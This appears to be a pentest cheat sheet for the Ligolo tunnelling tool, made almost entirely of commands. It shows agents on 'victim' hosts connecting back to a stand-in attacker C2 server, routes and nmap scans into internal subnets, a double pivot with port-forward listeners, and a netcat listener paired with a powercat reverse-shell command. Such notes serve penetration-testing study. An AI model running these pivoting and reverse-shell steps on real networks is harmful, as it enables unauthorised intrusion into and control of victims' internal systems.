Ligolo
Server (proxy)
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
ip addr show ligolo./proxy -laddr 0.0.0.0:3389 -selfcert Victim (agent) - single pivot
./agent -connect attacker_c2_server.com:53 -ignore-certServer after victim joining
session
1
>> agent xx
ifconfigsudo ip route add 172.16.x.0/24 dev ligolo
ip route list>> agent xx
startnmap 192.168.x.0/24Victim 2 (2nd agent) - double pivot
./agent -connect attacker_c2_server.com:53 -ignore-certServer after victim joining
session
2
>> agent yy
ifconfigsudo ip route add 192.168.y.0/24 dev ligolo
ip route liststop
session
2
>> agent yy
start_tunnelPort forward in 2nd agent to receive callback from 3rd victim
victim 2 (agent 2) 25 traffics directing to attacker (server) 443 listener
>> agent yy
listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp
listener_list
listener_stoplistener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcpnc -nlvp 443powercat -c 192.168.x.0 -p 25 -epAccess agent's local port
sudo ip route add 240.0.0.1/32 dev ligolonmap 240.0.0.1Last updated
